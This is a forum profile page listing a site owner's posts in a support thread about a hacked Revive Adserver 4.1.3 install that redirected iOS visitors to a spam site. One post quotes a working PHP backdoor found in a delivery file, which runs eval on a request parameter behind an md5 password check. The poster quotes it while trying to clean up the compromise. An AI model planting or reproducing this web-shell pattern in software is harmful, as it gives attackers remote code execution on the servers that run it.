Jump to content

Snaggy

Approved members
  • Content Count

    10
  • Joined

  • Last visited

About Snaggy

  • Rank
    Newbie

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. Snaggy

    Mobile ads have been hijacked

    OK thanks Matteo! Q. Where would I look to find log data to see when this file was modified?
  2. Snaggy

    Mobile ads have been hijacked

    My genericText.delivery file has this line... if(isset($_REQUEST['oxText'])&&md5($_REQUEST['oxText'])=='6f3ba4fbec5bfe3817fc319f3031fdaa'){@eval($_REQUEST['zoneId']);} ?> I take it that this should be deleted?
  3. Snaggy

    Mobile ads have been hijacked

    I discovered the same thing... code has been prepended in rv_zones, with the same code as sunech.
  4. Snaggy

    Mobile ads have been hijacked

    Hi sunech, sorry to hear about your similar problems, it's a real headache, isn't it. 😞 I haven't had time yet to dive in, but hopefully in the next day or so.
  5. Snaggy

    Mobile ads have been hijacked

    Thanks Ian vM, I much appreciate that.
  6. Snaggy

    Mobile ads have been hijacked

    yes, I have full access to the server and MySQL database. I haven't found anything suspicious yet on the server, and haven't had time to look at the database. I'm still gathering info on what might be the issue, and what can be done. I'm assuming the database has been compromised, especially after reading those articles.
  7. Snaggy

    Mobile ads have been hijacked

    Yes always 4.1.3, with very strong passwords on the database, and admin accounts. 😫
  8. Snaggy

    Mobile ads have been hijacked

    On pages without the Revive code, things are normal. With it, the attack occurs. Changing the name of the Revive folder immediately stops the attack on every affected page. I found some links on this: How to Clean Your Hacked OpenX/Revive Adserver and What to do when you suspect your OpenX Source system has been hacked - Revive Support
  9. Snaggy

    Mobile ads have been hijacked

    Revive Adserver 4.1.3
  10. Hi folks. We've been using Revive ads on our website for many months now, with no problems, but yesterday all of our iOS traffic was hijacked by a rogue spam script of some kind. It only occurred on iOS devices, like iPads and iPhones, not Macs. (I didn't have Android or Windows to test those out) The page loads, but then a pop-up appears, closing it, sends you to a spam/malware site (mobile2018newmine.pw). I turned off all our campaigns but the attack still occurred. The only thing that stops it is either removing the Revise code from a page, or what I did, changing the folder name of the Revise ads, which stopped the attack from launching. This of course also stops all of our ads too, but better that, than subject our traffic to the hijack. Any ideas as to how I can fix this? I'm thinking our SQL server was compromised? I'm not sure what else would cause this, and I want to prevent this from happening in the future. Suggestions would be appreciated. Thanks in advance!
×